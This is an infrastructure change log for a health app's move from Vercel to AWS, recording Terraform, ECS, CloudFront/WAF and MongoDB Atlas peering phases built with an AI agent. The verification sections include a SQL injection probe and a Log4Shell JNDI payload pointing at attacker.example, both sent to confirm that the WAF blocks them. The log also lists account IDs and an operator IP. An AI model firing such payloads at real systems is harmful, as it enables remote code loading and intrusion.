Actor: taha.abbasi via SSO AdministratorAccess (prod 039624954211 + mgmt 778477254880); atlas CLI against prod project 69dc20c64005b222804dafa4; agent: Claude Opus 4.7 Linked: Issue #47 Phase 8; session log 2026-04-22-phase-8-prod-mirror.md; commits 611f268, 03a8dfc, a189041, release v0.17.0.

Why ​

Staging has been fully validated through Phases 0-7 — the Next.js app runs on AWS ECS with peered Atlas connectivity behind CloudFront + WAF, and every integration has been end-to-end exercised. Phase 8 replays the same Terraform into the prod AWS account so the prod AWS stack is standing and serving traffic on a private canary URL before Phase 10 cutover. No real user is moved in this phase. Vercel keeps serving askflorence.health + www exactly as before.

What shipped ​

AWS (prod account 039624954211):

  • VPC 10.20.0.0/16, 2 AZs, 2 NAT gateways (HA), 6 multi-AZ VPC endpoints.
  • KMS CMK alias/askflorence-prod, rotation on.
  • 15 prod/* Secrets Manager entries. Populated from Vercel env + rotated app-write password + stopgap population of narrow-scoped write secrets with the broad app-write URI until #56 prod session.
  • ACM cert askflorence.health + www + *.askflorence.health, DNS-validated via 2 Cloudflare CNAMEs, status ISSUED.
  • SES identity updates.askflorence.health, DKIM + MAIL FROM SUCCESS, DMARC p=quarantine, 6 DNS records added at Cloudflare. Account still in sandbox.
  • ECR askflorence-app with immutable tags, scan-on-push, 50-image retention, CMK-encrypted.
  • ECS cluster askflorence-prod, service askflorence-prod-app with 2 HA tasks (0.5 vCPU / 1 GB each), 90-day log retention.
  • ALB askflorence-prod-alb-1177205004.us-east-1.elb.amazonaws.com with HTTPS + deletion protection ON.
  • CloudFront distribution E9RU8LOGSYL9I (d1pnfyzua893hx.cloudfront.net) serving 3 aliases (apex + www + prod-canary), PriceClass_All, same WAFv2 ruleset as staging, same response-headers policy.
  • Atlas prod peering pcx-0cefe999865679045, routes in both prod private RTs, allowlist +10.20.0.0/16 (0.0.0.0/0 kept until Phase 10).
  • GitHub Actions deploy-prod.yml — workflow_dispatch trigger, OIDC federation, smokes origin.askflorence.health to bypass WAF-on-runner-IP false positives.

Cloudflare (manual adds by Taha): 10 DNS records total — 2 ACM validation CNAMEs, 6 SES verification records, 1 origin CNAME → ALB, 1 prod-canary CNAME → CloudFront.

MongoDB Atlas (prod project 69dc20c64005b222804dafa4): app-write password rotated (safe — Vercel's MONGODB_WRITE_URI was empty), 10.20.0.0/16 added to IP access list, peering connection established + routes.

Module changes:

  • infra/modules/cloudfront-waf/ gained an extra_aliases list var (default [] — backward-compatible for staging) so one distribution can serve multiple hostnames.

How ​

Same Terraform modules as staging, called from infra/envs/prod/ with prod-scoped inputs. Four sequential terraform apply passes: (1) network + KMS (28 resources), (2) secrets + ACM (31 resources), (3) SES (6 resources), (4) compute + edge (24 resources). Peering adopted via terraform import + one follow-up apply to reconcile tags + auto_accept flag.

Rollback ​

  • Canary out of traffic: delete the prod-canary.askflorence.health CNAME in Cloudflare. Distribution stays up but no one reaches it.
  • Scale ECS to 0: aws ecs update-service --cluster askflorence-prod --service askflorence-prod-app --desired-count 0. Apex + www are still Vercel, so real users are unaffected.
  • Full teardown: terraform destroy against infra/envs/prod/ after removing enable_deletion_protection on the ALB. CloudFront distribution disables + deletes (~15 min). VPC + KMS + secrets destroy. Atlas peering stays active on Atlas side (needs atlas networking peering delete to fully remove).
  • No Vercel rollback needed — no Vercel change was made.

Verification ​

All at https://prod-canary.askflorence.health (the non-advertised canary URL):

  • GET /api/health → 200 with commit SHA + env=prod
  • GET /api/counties?state={TX,NY}&zip=... → 200, response body identical to Vercel prod on same input
  • POST /api/waitlist → 200 with real waitlist_submission_id; Mongo write routed via peering (NAT never touched)
  • GET /?id=1' OR '1'='1 → 403 via WAF SQLi rule
  • Response headers from CloudFront: server: AskFlorence, HSTS (1 yr + preload), CSP, X-Frame-Options DENY, x-amz-cf-pop: LAX53-P6
  • ECS: 2 tasks, rollout COMPLETED, task def :4
  • CloudWatch aws-waf-logs-askflorence-prod-web-acl receiving WAF logs
  • ECS app log group receiving request logs

Pre-existing bug flagged ​

MONGODB_WRITE_URI on Vercel prod is empty (since 2026-04-16 per the env-var modification timestamp). All writes from Vercel prod (consumer waitlist, agent discovery, unsubscribe) have been failing with "MONGODB_URI_WAITLIST_WRITE or MONGODB_URI_SURVEY_WRITE or MONGODB_WRITE_URI must be set" for ~6 days. Not caused by Phase 8, surfaced by Phase 8. Follow-up: Taha sets the new MONGODB_WRITE_URI on Vercel (the app-write URI this phase populated into prod/mongodb/app-write).

What this phase does NOT do ​

  • Does not move any production DNS.
  • Does not change any Vercel config.
  • Does not retire anything (Resend, Vercel, Atlas 0.0.0.0/0 entry).
  • Does not provision narrow-scoped prod Atlas writers (stays as a #56 follow-up).
  • Does not request SES production access.

2026-04-22T22:30Z — Phase 7 staging Atlas VPC peering + M0 → M10 upgrade ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + mgmt 778477254880); atlas CLI against staging project 69e31af12fd2c0aef51bbb41; agent: Claude Opus 4.7 Linked: Issue #47 Phase 7; session log.

Why ​

Staging's Mongo traffic egressed to Atlas over the public internet via the NAT gateway, with Atlas's IP access list scoped to the NAT EIP 54.164.140.5/32 + the operator's laptop IP. Works, but leaves a public network path open. Phase 7 replaces that path with an AWS VPC peering connection into Atlas's dedicated VPC, then tightens the Atlas allowlist to a single VPC-CIDR entry. Post-apply: every bit of Mongo traffic rides an Amazon private fabric end-to-end, and revoking the allowlist to VPC-only is the durable proof.

M0 doesn't support peering (shared tier, AWS account is Atlas's own), so the cluster was first upgraded to M10 dedicated — same region, same SRV hostname, same users, same URIs.

What shipped ​

Atlas (staging project 69e31af12fd2c0aef51bbb41):

  • Cluster upgrade: M0 (TENANT) → M10 (AWS us-east-1, MongoDB 8.0.21, 10 GB disk). Upgrade took ~3 min on the API (UPDATING → IDLE), driven via atlas clusters upgrade --tier M10 --diskSizeGB 10 --mdbVersion 8.0. connectionStrings.standardSrv preserved as mongodb+srv://askflorence-staging.efsikmv.mongodb.net → zero secret re-population.
  • Auto-provisioned network container on the project (Atlas allocates one AWS VPC per project+region on first M10): container 69e9356ea15f1b75005337a8, Atlas VPC vpc-0c1e118736ac1fb74 in Atlas's account 354811016174, CIDR 192.168.248.0/21, region US_EAST_1.
  • Peering connection created via atlas networking peering create aws: Atlas peering ID 69e939017b7816840c17063c, resulting AWS peering ID pcx-05d74ae6d34a31a02. Status progressed INITIATING → AVAILABLE on Atlas and pending-acceptance → active on AWS.
  • IP access list tightened from 2 entries (54.164.140.5/32 NAT EIP, 136.38.212.186/32 Taha laptop) → 1 entry (10.40.0.0/16 staging VPC CIDR). Public path to Atlas is now closed; only traffic originating in our VPC can reach the cluster.

AWS staging (549136075525):

  • VPC peering accepter — aws_vpc_peering_connection_accepter.atlas_staging resource in Terraform (imported from the out-of-band-created peering). AllowDnsResolutionFromRemoteVpc=true on the accepter side so Atlas's split-horizon DNS returns private shard IPs when queried from within our VPC.
  • Routes added to both private route tables (rtb-0b5a5b1da1f0a99c4, rtb-00fc1026859373d4f): 192.168.248.0/21 → pcx-05d74ae6d34a31a02. Managed as aws_route.atlas_from_private_{a,b} Terraform resources.
  • Network module updated: aws_route_table.private now has lifecycle { ignore_changes = [route] }, so external aws_route resources (peering, future transit gateway) don't conflict with the inline 0.0.0.0/0 → NAT default. Added private_route_table_ids + public_route_table_ids module outputs.
  • ECS service force-new-deployment after peering activated so the running task picked up fresh DNS + TLS state (the pre-existing task's MongoClient had cached connections over the public path, which surfaced as 30s server-selection timeouts until the task was replaced).

No Vercel change. No app code change. No Mongo URI change. Everything in this phase is purely networking + tier.

Tricky bit worth preserving ​

After removing the NAT-EIP allowlist entry but before forcing a fresh ECS task, /api/waitlist returned HTTP 504 Gateway Timeout with ECS logs showing MongoServerSelectionError: Server selection timed out after 30000 ms. Briefly re-added the NAT EIP to keep the service serving while debugging. Diagnosis: the running task held DNS + connection state from before peering went live, so it was still trying to reach shards over the (now-blocked) public path. aws ecs update-service --force-new-deployment rotated the task; new task's fresh SRV lookup from within the peered VPC returned Atlas's private IPs, and the connection went green through peering. NAT EIP removed again cleanly. This is the canonical "peering-on-existing-cluster" gotcha — noting explicitly so Phase 8 prod peering runs force-new-deployment immediately after allowlist tightening, not 20 minutes later.

Rollback ​

  • Immediate (app breaking): re-add 54.164.140.5/32 to the Atlas allowlist via atlas accessLists create 54.164.140.5 --type ipAddress --projectId 69e31af12fd2c0aef51bbb41. Public path returns within 30s. The peered path stays wired in parallel.
  • Full: atlas networking peering delete 69e939017b7816840c17063c --projectId 69e31af12fd2c0aef51bbb41 + remove the peering-related routes + aws_vpc_peering_connection_accepter from Terraform. Atlas CIDR route drops; traffic falls back to NAT path.
  • Cluster downgrade M10 → M0: not supported by Atlas (one-way). To un-do the tier upgrade, destroy + recreate at M0 with a scrubbed data dump. Deliberate non-goal — M10 is where staging stays.

Verification ​

All from operator laptop over public internet (staging proxied through CloudFront from Phase 6):

  1. GET https://stage.askflorence.health/api/health → HTTP 200.
  2. POST https://stage.askflorence.health/api/waitlist {...} → HTTP 200 with real Mongo waitlist_submission_id while Atlas allowlist is scoped to 10.40.0.0/16 only (operator laptop IP NOT in allowlist, NAT EIP NOT in allowlist — the only reachable path from the ECS task to Atlas is the peering connection).
  3. GET https://stage.askflorence.health/api/counties?state=TX&zip=75001 → HTTP 200 with TX county data — proves the CMS proxy path (which egresses via NAT to the public internet) is unaffected by the Atlas peering change.
  4. atlas accessLists list returns exactly one entry: 10.40.0.0/16.
  5. aws ec2 describe-vpc-peering-connections shows pcx-05d74ae6d34a31a02 status active with accepter AllowDnsResolutionFromRemoteVpc=true.
  6. Private RT routes confirmed: both private RTs have 192.168.248.0/21 → pcx-05d74ae6d34a31a02 active.
  7. Terraform plan clean after import + apply.

What this phase does NOT do ​

  • No change to prod Atlas. Prod project is untouched. Phase 8 re-peers the existing M10 HIPAA prod cluster to the new prod VPC.
  • No PrivateLink on staging. VPC peering is the chosen mechanism; PrivateLink is redundant on top and costlier.
  • No cluster backup enabled on staging. M10 supports PITR but staging has no PHI and no production-traffic recovery requirement. Backup stays off; prod has PITR.
  • No secret rotation. The staging/mongodb/* Secrets Manager entries still hold the M0-era SRV URI, which is identical to the M10 SRV URI — no rotation required.

2026-04-22T05:30Z — Phase 6 staging front door: CloudFront + WAFv2 + security headers ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + mgmt 778477254880); agent: Claude Opus 4.7 Linked: Issue #47 Phase 6; plan file ~/.claude/plans/hey-so-okay-that-delightful-eich.md.

Why ​

Phase 5 exposed the staging ECS service directly to the public internet via an ALB with just a TLS cert. Phase 6 puts a CloudFront distribution + WAFv2 web ACL in front of that ALB. Three goals:

  1. Edge protection. Every request now passes through WAFv2 with five AWS managed rule groups (Common, KnownBadInputs, SQLi, IpReputation, AnonymousIp) plus a rate-based rule (2000 req/5min/IP). SQLi probes and log4shell-style payloads are rejected at the edge before reaching ECS.
  2. Security headers + IP-opacity. CloudFront's response-headers policy appends HSTS, CSP, X-Frame-Options, Referrer-Policy, X-Content-Type-Options and overrides Server → AskFlorence. Strips X-Powered-By + framework version headers. Brings the staging stack in line with the migration plan's "a competitor inspecting headers should not identify our stack" requirement.
  3. Prod-stencil validation. Everything in this module is going to be re-applied verbatim in askflorence-prod at Phase 8. Staging is where we iterated the Terraform, the origin pattern, and the CSP directive set — cheap mistakes now instead of expensive ones at cutover.

What shipped ​

New Terraform module infra/modules/cloudfront-waf/:

  • aws_wafv2_web_acl.this — CLOUDFRONT scope, default action Allow, 6 rules (priorities 0-100).
  • aws_cloudwatch_log_group.waf — CMK-encrypted, 14-day retention on staging. Named aws-waf-logs-* per AWS WAF's hard requirement.
  • aws_cloudwatch_log_resource_policy.waf — authorizes delivery.logs.amazonaws.com to write to aws-waf-logs-* in this account, constrained by aws:SourceAccount + aws:SourceArn.
  • aws_wafv2_web_acl_logging_configuration.this — attaches the log group to the web ACL, redacts authorization + cookie headers.
  • aws_cloudfront_response_headers_policy.this — security headers + header-strip (X-Powered-By, X-AspNet*-Version).
  • aws_cloudfront_distribution.this — HTTPS-only origin, origin shield us-east-1, HTTP/2+HTTP/3, TLSv1.2_2021 minimum, two cache behaviors (default CachingDisabled for SSR, /_next/static/* CachingOptimized).

Staging wiring infra/envs/staging/cloudfront.tf:

  • Module called with alias = "stage.askflorence.health", origin_hostname = "origin.stage.askflorence.health".
  • stage.askflorence.health A-alias swung in place from ALB → CloudFront.
  • New stage.askflorence.health AAAA-alias added (CloudFront supports IPv6 natively).
  • origin.stage.askflorence.health A-alias added pointing at ALB. Covered by wildcard SAN on the existing ACM cert so CloudFront-to-ALB HTTPS handshake validates.

Resources created in the staging account (549136075525):

KindName / ID
CloudFront distributionEJQQLYE9IE4U9 (dk0jmb66fh49u.cloudfront.net)
WAFv2 web ACLaskflorence-staging-web-acl (arn:...webacl/askflorence-staging-web-acl/4d7e1072-04b4-466b-b67a-5ce03036757d)
Response-headers policyaskflorence-staging-response-headers
CloudWatch log groupaws-waf-logs-askflorence-staging-web-acl (14d retention, staging CMK)
Route 53 A/AAAAstage.askflorence.health → CloudFront
Route 53 Aorigin.stage.askflorence.health → ALB

How ​

  • AWS_PROFILE=askflorence-staging terraform apply (backend via TerraformBackendRole in mgmt from Phase 3 pattern).
  • Single apply; the existing aws_route53_record.stage_alias Terraform address was moved from alb.tf → cloudfront.tf with a retargeted alias, producing one in-place Route 53 update and zero DNS gap.
  • First CloudFront distribution create took ~3 min (fast for CloudFront — sometimes it's 15+).
  • One apply-time surprise: the CloudFront API rejects Via as a removable header even though the documented valid-values list includes it. The module comments note this; Via isn't in the strip list. CloudFront adds its own Via header identifying the CDN (not the origin), which is acceptable given TLS ALPN + cert SANs already reveal we're behind CloudFront.

Rollback ​

  • DNS rollback (5 min): terraform apply a prior commit to revert stage.askflorence.health alias back to the ALB. CloudFront distribution stays up, just unreferenced.
  • Distribution disable: aws cloudfront update-distribution with Enabled=false — serves a 403 to viewers until re-enabled or DNS rolls back.
  • Full destroy: terraform destroy on the module.cloudfront_staging targets. Note CloudFront takes ~15 min to destroy even when disabled (AWS's unavoidable propagation step).
  • No Vercel prod impact from any rollback scenario — this phase only touches the staging account.

Verification ​

  • GET https://stage.askflorence.health/api/health → HTTP 200, via LAX54-P10 CloudFront edge, response headers include: server: AskFlorence, strict-transport-security: max-age=31536000; includeSubDomains; preload, x-frame-options: DENY, referrer-policy: strict-origin-when-cross-origin, x-content-type-options: nosniff, full CSP directive.
  • SQLi probe GET /?id=1%27%20OR%20%271%27=%271 → HTTP 403 (AWSManagedRulesSQLiRuleSet block).
  • Log4shell probe User-Agent: ${jndi:ldap://attacker.example/a} → HTTP 403 (KnownBadInputsRuleSet block).
  • Normal GET / → HTTP 200.
  • X-Powered-By absent from response (confirmed via curl -I).
  • Origin cert validation: CloudFront → ALB via origin.stage.askflorence.health handshakes clean (covered by *.stage.askflorence.health wildcard on the existing ACM cert).
  • Vercel regression: none possible — this phase never touched Vercel.

What this phase does NOT do ​

  • CloudFront access logs are not enabled. Audit evidence is covered by WAF logs + org CloudTrail + ALB access logs (already on). Standard access logs can be added in a follow-up if needed.
  • Real-time logging to Kinesis Data Streams not wired. WAF logs go to CloudWatch directly, which is simpler and meets the evidence requirement.
  • Lambda@Edge not used. Header scrubbing beyond what RemoveHeadersConfig allows (specifically Via) would require Lambda@Edge — not in scope for v1.
  • Prod account unchanged. Phase 8 mirror will take this module and call it in infra/envs/prod/ with a prod-scoped alias + cert.

2026-04-21T09:30Z — Phase 5 staging go-live: ECR + ECS + ALB + SES path + PostHog opt-out ​

Actor: taha.abbasi via SSO AdministratorAccess (staging 549136075525 + mgmt 778477254880); agent: Claude Opus 4.7 Linked: Issue #47 Phases 5.1–5.7; Issue #56 staging-side waitlist user; session log 2026-04-21-phase-5-staging-go-live.md; commits e24c5ca, 44c1493, 90d05af, 04cfd35.

Why ​

Phases 1–4 built the AWS scaffolding (accounts, org baseline, Terraform, networking, KMS, secrets, ACM, SES identity, Route 53 subzone). Phase 5 is when the Next.js app actually starts running on it. Goal: the exact same build that Vercel serves today should be reachable on stage.askflorence.health via AWS ECS with no feature regressions, and every outbound integration (Atlas, CMS API, SES, PostHog) should work through the staging network path without weakening security posture. Vercel prod continues to serve askflorence.health unchanged through the entire phase.

What shipped ​

AWS (staging account 549136075525):

  • New ECR repository askflorence-app (immutable tag policy, scan-on-push, KMS-encrypted).
  • New ECS cluster askflorence-staging with Fargate + FARGATE_SPOT capacity providers; Container Insights on.
  • New ECS task definition family askflorence-staging-app-task — 0.25 vCPU / 0.5 GB, non-root UID 1001, port 3000, awslogs driver to /aws/ecs/askflorence-staging-app (14-day retention, CMK-encrypted).
  • New ECS service askflorence-staging-app (desired 1, min 100 / max 200 for rollover; circuit breaker on).
  • New ALB askflorence-staging-alb in the 2 public subnets. HTTPS listener with the stage.askflorence.health ACM cert from Phase 4; HTTP redirects to HTTPS. Target group askflorence-staging-tg health-checks GET /api/health on port 3000.
  • Route 53 stage.askflorence.health A-alias record → staging ALB.
  • Task execution role permissions for secretsmanager:GetSecretValue + kms:Decrypt on each staging secret ARN and the staging CMK. Task role permissions for ses:SendEmail/ses:SendRawEmail.
  • Task role SES policy widened mid-session from identity/stage.askflorence.health to identity/* (still account-scoped). SES authorizes on every identity referenced in a send (From + To/CC/BCC), and sandbox requires the recipient identity also be verified in-account; the narrower scope was rejecting sends to the verified taha@askflorence.health sandbox recipient. Tighter scoping will return post-cutover once the account is out of sandbox and recipient-identity verification is no longer relevant.
  • staging/mongodb/waitlist-write Secrets Manager secret populated with a real URI (was the placeholder string since Phase 4). New secret version e2d9dc25-a1f4-4235-a065-8acf67433892.

Atlas (staging project 69e31af12fd2c0aef51bbb41):

  • New custom role role_writer_waitlist — 7 actions (FIND, INSERT, UPDATE, REMOVE, CREATE_INDEX, DROP_INDEX, COLL_MOD) scoped to askflorence.agent_waitlist_submissions.
  • New DB user app_writer_waitlist (password-auth, 32-char alphanumeric, never echoed; temp-file handoff into Secrets Manager + .env.staging.local).
  • Prod project untouched.

App code (commits on main, pushed to staging branch for GH Actions deploy):

  • e24c5ca — src/lib/email.ts provider abstraction; /api/waitlist + /api/agents/discovery refactored to sendEmail(); @aws-sdk/client-sesv2 ^3.1033.0 added.
  • 44c1493 — EMAIL_FROM_DOMAIN override inside sendEmail(); infra/envs/staging/ecs.tf sets it to stage.askflorence.health.
  • 90d05af — task role SES policy widened to identity/*.
  • 04cfd35 — src/lib/posthog-server.ts fail-open + staging no-op; instrumentation-client.ts host-based opt-out via extended syncNoTrackMode; Dockerfile + workflow wiring for NEXT_PUBLIC_POSTHOG_PROJECT_TOKEN + NEXT_PUBLIC_POSTHOG_HOST; ECS task def env plumbed.

GitHub Actions:

  • Repo variables NEXT_PUBLIC_POSTHOG_PROJECT_TOKEN + NEXT_PUBLIC_POSTHOG_HOST set (public values, variables not secrets).
  • deploy-staging.yml build step passes both as --build-args to docker buildx build.

How ​

Same cross-account Terraform pattern from Phase 3: local env AWS_PROFILE=askflorence-staging; backend block in versions.tf assumes TerraformBackendRole in mgmt for state I/O. ECS module sets lifecycle { ignore_changes = [container_definitions] } on the task definition so CI/CD owns env-var + image updates — this session registered revisions :3–:8 out-of-band via aws ecs register-task-definition when env needed to change between GH Actions deploys. All AWS writes were via the staging SSO AdministratorAccess permission set or the GH Actions OIDC role from Phase 3.

Rollback ​

  • App-level: git revert any of the 4 commits and push to staging; GH Actions redeploys the prior image. All commits are additive + feature-flagged.
  • Task-def env changes: register a prior revision and update-service --task-definition <prior-arn>. Prior revisions retained per ECS defaults.
  • IAM widening: re-narrow the SesSend inline policy to identity/stage.askflorence.health; SES sends will start failing to sandbox recipients again but sends from the staging domain keep working.
  • Atlas user: atlas dbusers delete app_writer_waitlist --projectId 69e31af12fd2c0aef51bbb41; secret reverts to the pre-session PLACEHOLDER value.
  • No Vercel rollback needed — no Vercel change made.

Verification ​

All on stage.askflorence.health:

  • GET /api/health returns {"status":"ok","commit":"04cfd35...","env":"staging"}.
  • POST /api/waitlist returns 200 with real waitlist_submission_id; Mongo row present; AWS/SES/Send metric +1.
  • CloudWatch logs /aws/ecs/askflorence-staging-app: zero errors post-deploy.
  • Client bundle /_next/static/chunks/0u92fl5tvujj9.js contains both the expected PostHog token and the literal stage.askflorence.health (baked at build time, staging opt-out behavior present).
  • Vercel regression: npm run build green with EMAIL_PROVIDER unset; Resend send path unchanged.

2026-04-21T04:30Z — Phase 3a: Terraform scaffolding + GitHub Actions OIDC federation ​

Actor: taha.abbasi via SSO AdministratorAccess (mgmt + each member) Linked: Issue #47, plan file ~/.claude/plans/hey-so-okay-that-delightful-eich.md Phase 3

Why ​

Phase 1–2.5 resources were provisioned by AWS CLI. Phase 3 introduces Terraform as the management layer for everything going forward. Phase 3a scope is minimal and non-destructive: state backend + per-account directory structure + OIDC federation so GitHub Actions can deploy without long-lived IAM keys. No existing Phase 1/2/2.5 resources are touched — they'll be terraform imported in Phase 3b (optional, later).

What shipped ​

State backend (management account 778477254880):

  • New S3 bucket askflorence-tfstate-778477254880 — versioning, SSE-KMS with alias/askflorence-data CMK, public access blocked, deny-non-SSL, org-wide read/write on env/<env>/* prefix via aws:PrincipalOrgID condition.
  • New DynamoDB table askflorence-tfstate-locks (PAY_PER_REQUEST, SSE-KMS) with resource policy allowing org principals to Get/Put/DeleteItem + DescribeTable.
  • KMS CMK alias/askflorence-data policy extended: org principals can GenerateDataKey/Decrypt/DescribeKey when ViaService matches s3.us-east-1.amazonaws.com.
  • New IAM role TerraformBackendRole (mgmt): trust scoped to aws:PrincipalOrgID == o-vefew8kgv1, inline policy grants tfstate bucket + DynamoDB + KMS access. Each env's backend config assumes this role for state operations — this is the canonical pattern because Terraform S3 backend doesn't cross-account cleanly without it.

Terraform directory structure (repo root infra/):

  • infra/README.md — layout + operations doc
  • infra/_shared/versions.tf + tags.tf — reference files; the backend blocks live per-env because backend config can't be templated with variables
  • infra/envs/management/ — mgmt account root (state key env/management/terraform.tfstate)
  • infra/envs/prod/ — prod account root (state key env/prod/terraform.tfstate)
  • infra/envs/staging/ — staging account root (state key env/staging/terraform.tfstate)
  • infra/envs/log-archive/ — log-archive account root (state key env/log-archive/terraform.tfstate)
  • infra/modules/ — empty (populated in Phase 4+ with network, ecs-service, cloudfront-waf, secrets, alb, ecr, monitoring)
  • infra/envs/management/outputs-reference.md — lists resources pending tf-import in Phase 3b

GitHub Actions OIDC federation (per account):

  • aws_iam_openid_connect_provider.github_actions with GitHub's pinned thumbprints in each of 4 accounts.
  • aws_iam_role.github_actions_deploy (GitHubActionsDeployRole) in each account, trust scoped to:
    • mgmt: main branch + staging branch + production environment + staging environment + PRs
    • prod: main branch + production environment only (staging branch cannot assume)
    • staging: staging branch + staging environment + PRs
    • log-archive: main branch + staging branch + PRs (state-only operations, no workload permissions)
  • Inline policies least-privilege: state read/write on own env prefix; prod/staging add scaffold ECR/ECS/CW Logs permissions (tightened to specific ARNs in Phase 5 when the cluster + repo exist); log-archive is state-only.

Versions ​

  • Terraform 1.14.9 (installed via direct HashiCorp download — the Homebrew binary on Taha's machine was x86_64 under Rosetta, which slowed provider plugin startup enough to time out; arm64 native at ~/.local/bin/terraform)
  • AWS provider ~> 6.0 (locked to 6.41.0 in .terraform.lock.hcl per env)
  • tls provider ~> 4.0

Verification ​

  • terraform plan on all 4 envs returns clean (exit code 0, "no changes").
  • All 4 GitHubActionsDeployRole ARNs present + assumable.
  • TerraformBackendRole assumable from SSO sessions in all 4 profiles (direct verification via sts assume-role).
  • State files present in s3://askflorence-tfstate-778477254880/env/{management,prod,staging,log-archive}/terraform.tfstate — versioned, KMS-encrypted.

SOC 2 / HIPAA / EDE relevance ​

  • SOC 2 CC6.1 (Logical Access) + CC8.1 (Change Management): IaC is now the documented path for AWS changes. Every future resource change appears as a tracked PR with diff review + test plan.
  • SOC 2 CC6.7 (transmission restrictions): tfstate bucket denies non-SSL, SSE-KMS encryption at rest.
  • Credential hygiene: zero long-lived IAM access keys for CI/CD. GitHub Actions uses OIDC + short-lived STS tokens only. Matches the Drata-readiness requirement from the migration plan.

Phase 3b (deferred, next session) ​

terraform import pass to bring existing Phase 1/2/2.5 resources into state. Full list in infra/envs/management/outputs-reference.md. Prioritized by impact: SCPs, SSO permission sets, budgets, CloudTrail, KMS keys, log buckets first; Drata stubs + IAM user policy details last.


2026-04-21T07:00Z — Phase 4 refactor: Route 53 subzone delegation + DNS-strategy decision ​

Actor: taha.abbasi via SSO AdministratorAccess in staging account 549136075525 (Terraform backend assumes TerraformBackendRole in mgmt) Linked: Issue #47

DNS architecture decision — apex-on-Cloudflare + engineering subzone in Route 53 ​

Per Taha 2026-04-21, matching his prior AWS pattern:

  • askflorence.health apex stays on Cloudflare permanently. G Suite MX, Google Search Console verification TXT, other site verifications, and (at Phase 10) the CNAME to the prod CloudFront distribution. The consumer-facing app at apex continues to be served via Cloudflare DNS (DNS-only, no proxy) pointing to CloudFront via Cloudflare's CNAME-flattening feature.
  • stage.askflorence.health is a delegated Route 53 subzone in the staging AWS account. Every engineering DNS record under this subzone is Terraform-managed.
  • Phase 8 prod pattern (future): prod.askflorence.health → Route 53 in prod account for admin/internal/API endpoints. User-facing askflorence.health apex stays Cloudflare-authoritative.

Net effect: one-time 4 NS records at Cloudflare for staging (and later prod) instead of manually adding every individual AWS-side DNS record. Cloudflare remains the identity-verification + marketing DNS owner forever.

What shipped ​

Consolidation: SES staging identity migrated from staging.askflorence.health to stage.askflorence.health. One subdomain for both web (ACM + ALB + CloudFront) and email (SES DKIM + MAIL FROM + DMARC). Simpler DNS story, one subzone delegation, matches Taha's intent.

Terraform changes:

  • New infra/envs/staging/dns.tf with aws_route53_zone.staging for stage.askflorence.health.
  • modules/acm/ extended with manage_dns_in_route53 bool + route53_zone_id. When true, auto-creates validation CNAMEs and waits for issuance. When false, records still exposed via outputs for Cloudflare-manual addition (prod apex cert path if we ever need it).
  • modules/ses/ extended with the same boolean + zone ID pattern. When true, auto-creates DKIM CNAMEs + MAIL FROM MX/SPF + DMARC TXT in Route 53.
  • Used boolean (manage_dns_in_route53) rather than route53_zone_id != "" check because count and for_each can't evaluate on values that are "known after apply" (the freshly-created zone's ID was unknown at initial plan time).
  • Two-pass apply: terraform apply -target=aws_route53_zone.staging first to create the zone, then the full plan picked up the records.

Destroyed: previous staging.askflorence.health SES identity + mail_from_attributes (never had DNS backing, zero impact to remove).

Created: Route 53 zone stage.askflorence.health (Z06011002V7IQH7MBL1JY), new SES identity for stage.askflorence.health, 3 DKIM CNAME records, 1 MAIL FROM MX + 1 MAIL FROM SPF TXT, 1 DMARC TXT, 2 ACM validation CNAMEs (both SANs share the same validation record — allow_overwrite = true handles dedup), 1 aws_acm_certificate_validation wait resource.

Updated Taha next action ​

Add 4 NS records at Cloudflare (DNS-only, no proxy) delegating stage.askflorence.health to the 4 AWS nameservers listed in phase-4-staging-dns-records.md. Once propagated (~1-5 min), ACM auto-validates + SES auto-verifies. Zero other manual DNS work for the remainder of Phase 4-7 staging build.

Vercel prod impact ​

Zero. All changes isolated to staging AWS account + a future Cloudflare NS add.


2026-04-21T06:00Z — Phase 4: staging networking + KMS + Secrets Manager + ACM + SES ​

Actor: taha.abbasi via SSO AdministratorAccess in staging account 549136075525 (Terraform backend assumes TerraformBackendRole in mgmt for state) Linked: Issue #47, plan file Phase 4 scope

What shipped ​

55 resources created in staging account via Terraform (infra/envs/staging/):

Networking (module: infra/modules/network):

  • VPC 10.40.0.0/16 with DNS hostnames + resolution enabled (vpc-0b074e33f5599c587)
  • 4 subnets across us-east-1a + us-east-1b: public 10.40.0.0/24 + 10.40.1.0/24, private 10.40.10.0/24 + 10.40.11.0/24
  • Internet Gateway + single NAT Gateway in us-east-1a (cost-optimized for staging; prod uses nat_ha=true for per-AZ NAT)
  • Route tables: 1 public (→ IGW), 2 private (→ single NAT via route), + all associations
  • VPC endpoints: S3 Gateway (free), and interface endpoints in us-east-1a only (single AZ cost optimization): kms, secretsmanager, bedrock-runtime (Bedrock Runtime endpoint is forward-looking per plan's Phase 3 migration readiness — unused today)
  • Security group askflorence-staging-vpc-endpoints allowing HTTPS from VPC CIDR
  • VPC Flow Logs → CloudWatch Log Group /aws/vpc/askflorence-staging/flow-logs with 7-day retention + IAM role for delivery

KMS (module: infra/modules/kms):

  • CMK alias/askflorence-staging (ARN ending ...da11a033...3ec7e) with annual rotation + 30-day deletion window
  • Key policy: staging root IAM full access, Secrets Manager service (GenerateDataKey/Decrypt/DescribeKey), CloudWatch Logs service (Encrypt*/Decrypt*/ReEncrypt*/GenerateDataKey*/Describe*)

Secrets Manager shells (module: infra/modules/secrets):

  • 13 secrets under staging/* namespace, all encrypted with the staging CMK, all tagged with DataClass:
    • mongodb/app-read (phi), mongodb/survey-write (phi), mongodb/plans-write (pii), mongodb/agents-write (phi), mongodb/agents-admin (phi), mongodb/audit-read (phi), mongodb/waitlist-write (pii)
    • cms-api-key (cms_hub), posthog-key (pii), unsubscribe-token-secret (pii)
    • anthropic-api-key (phi), bedrock-runtime-role-arn (phi), openai-whisper-api-key (phi) — Florence workstream reservations
  • Each secret has a placeholder version (PLACEHOLDER-REPLACE-ME-OUT-OF-BAND) with lifecycle.ignore_changes on value — Terraform manages shell + tags, values populated out-of-band via CLI when actually needed
  • 30-day recovery window on deletion

ACM cert (module: infra/modules/acm):

  • Certificate for stage.askflorence.health + SAN *.stage.askflorence.health
  • ARN: arn:aws:acm:us-east-1:549136075525:certificate/3023432f-d564-4a3c-8db5-e4a7423c9c2f
  • Status: PENDING_VALIDATION (requires one CNAME at Cloudflare — see phase-4-staging-dns-records.md)

SES identity (module: infra/modules/ses):

  • Domain identity staging.askflorence.health
